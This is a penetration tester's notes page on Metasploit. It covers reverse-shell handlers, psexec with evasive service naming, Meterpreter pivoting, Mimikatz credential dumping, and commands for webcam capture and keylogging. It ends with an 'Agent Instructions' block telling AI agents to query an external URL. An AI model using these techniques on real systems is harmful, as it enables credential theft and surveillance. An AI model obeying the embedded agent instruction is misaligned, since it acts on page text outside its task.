# Metasploit
### Common Uses
Using the `exploit/multi/handler` to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
Use the `exploit/windows/smb/psexec` module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the `SERVICE_FILENAME` option to remove the random garbage used, because its suspicious (using something like `svchost` helps hide!).
### Meterpreter
Payload with fancy shell, series of DLLs injected into a process memory and doesnt touch the disk, no separate process created. All comms over meterpreter are TLS encrypted unless specifically told not to.
```bash
# Below adds a port fwd, localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1
# Below adds a route to move all traffic for a subnet thru meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1 # routes thru session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1 # routes thru session 1 for host 10.0.0.5
```
#### Managing Meterpreter Sessions
Sessions are managed with the `sessions -l` command. Channels inside of sessions are managed with `channels -l` command. Upgrade existing shells with the `sessions -u 1` command.
`CTRL-Z` will background a channel or session
Load additional modules using `use [module name]`
#### Mimikatz in Meterpreter
We can load mimikatz directly into a running meterpreter session, giving us serious power. Need to be running as `SYSTEM`, and we need to make sure the process we're in is the same architecture as the host.
Check if we're in matching arch types with `sysinfo`. Check the `Architecture` and `Meterpreter` info to make sure they match. If we need to move, check which running processes have the correct arch and are running as `SYSTEM` also with `ps -A x64 -s`, then we can move with `migrate [PID]`. Validate the arch and meterpreter types match with `sysinfo` again.
Now we can import the mimikatz module with `load kiwi`. Running `help` will show our new mimikatz commands we can use. Using `creds_all` will dump all available hashes and plaintext passwords!
#### Meterpreter Commands
| Command | Function |
| ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------- |
| `help` | shows all available commands |
| `sysinfo` | Shows computer name, OS, and kernel information |
| `shell` | Launch a command shell on the host |
| `getpid` | show process ID of current meterpreter process |
| `getuid` | shows current user ID meterpereter is running under |
| `ps` | get list of processes |
| `migrate` | attempts to move to a different process ID |
| `cd` / `lcd` | change dir, local change dir |
| `ls` / `lls` | list contents, local list contents |
| `download` | download a file from the machine |
| `upload` | upload a file to the machine |
| `edit` | edit a file using vi or nano |
| `ipconfig` | show host networking information |
| `route` | displays, adds, or deletes host routing table |
| `portfwd` | forwards traffic to a different location as a TCP relay |
| `creds_all` | Mimikatz meterpreter module as kiwi |
| `hashdump` | gather hashes from host memory, requires SYSTEM privs |
| `run hashdump` | Pulls from the registry (SAM and Syskey) |
| `run post/windows/gather/smart_hashdump` | Gathers from the disk NTDS.dit and SAM |
| `run post/windows/gather/hashdump` | Pulls from registry (SAM and Syskey) |
| `screenshot -p /tmp/screen.jpg` | grabs a screenshot of the desktop |
| `uictl` | Turn user devices on or off |
| webcam\_list
webcam\_snap
| Take control of a webcam available to the host |
| keyscan\_start
keyscan\_dump
keyscan\_stop
| Keystroke logger to gather information as its typed |
### Arsenal
Modular combination of scanners, exploits, payloads, and post modules.
| User Interface | Purpose |
| -------------- | -------------------------------------------------------------------------------- |
| `msfconsole` | Basic MSF prompt for exploitation |
| `msfd` | Daemon listening on TCP 55554 allowing msfconsole access to anyone that connects |
| `msfrpcd` | XMLRPC controlled MSF, default TCP 55553 using SSL |
| `msfcli` | MSF with all options specified in a single command, useful for scripting |
| `msfvenom` | Used to generate malicious payloads and binaries |
### Modules
| Module Name | Purpose |
| ----------- | ---------------------------------------------------------- |
| `auxiliary` | Port scanners, DoS tools, login checks, etc |
| `encoders` | Convert exploits and payloads to attempt to bypass filters |
| `exploits` | Exploits used to attack a system |
| `nops` | Create NOP sleds |
| `payloads` | Huge list of payloads based on system and type |
| `post` | Post-exploitation modules to futher exploit a system |
### Troubleshooting
Having issues importing a module? make sure that you check the logs at `~/.msf4/logs/framework.log`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.m4lwhere.org/offensive/metasploit.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.